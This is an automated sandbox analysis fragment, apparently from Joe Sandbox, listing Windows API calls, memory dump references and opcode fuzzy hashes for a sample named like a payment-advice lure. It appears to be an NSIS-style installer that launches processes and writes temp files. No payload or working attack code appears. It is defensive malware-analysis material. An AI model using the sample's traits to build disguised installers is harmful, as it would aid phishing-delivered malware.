• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
• String ID:
• API String ID: 1404258612-0
• Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
• Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
• Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
• Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
APIs
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
  • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
  • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
• WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
• String ID:
• API String ID: 3585118688-0
• Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
• Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
• Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
• Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
APIs
• IsWindowVisible.USER32(?), ref: 00405137
• CallWindowProcW.USER32(?,?,?,?), ref: 00405188
  • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
• Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
• Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
• Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
APIs
• GetTickCount.KERNEL32 ref: 00405BA3
• GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
• Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
• Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
• Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
• CloseHandle.KERNEL32(?), ref: 00405697
Strings
• Error launching installer, xrefs: 00405678
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
• Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
• Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
• Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
• Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
• Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
• Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
• Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
• Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
• Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
• Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
• Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
• Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
• Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
• Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
• Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
• lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
• CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
• lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0